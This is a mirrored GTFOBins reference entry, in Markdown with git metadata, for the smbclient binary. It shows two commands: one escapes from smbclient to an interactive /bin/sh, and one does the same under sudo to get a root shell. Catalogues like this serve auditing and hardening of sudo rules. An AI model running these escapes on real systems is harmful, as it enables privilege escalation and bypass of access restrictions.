1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-14 19:31:34 +01:00
GTFOBins.github.io/_gtfobins/smbclient.md
2018-08-31 11:09:19 +02:00

13 lines
239 B
Markdown

---
description: A valid SMB/CIFS server must be available.
functions:
execute-interactive:
- code: |
smbclient \\ip\share
!/bin/sh
sudo-enabled:
- code: |
sudo smbclient \\ip\share
!/bin/sh
---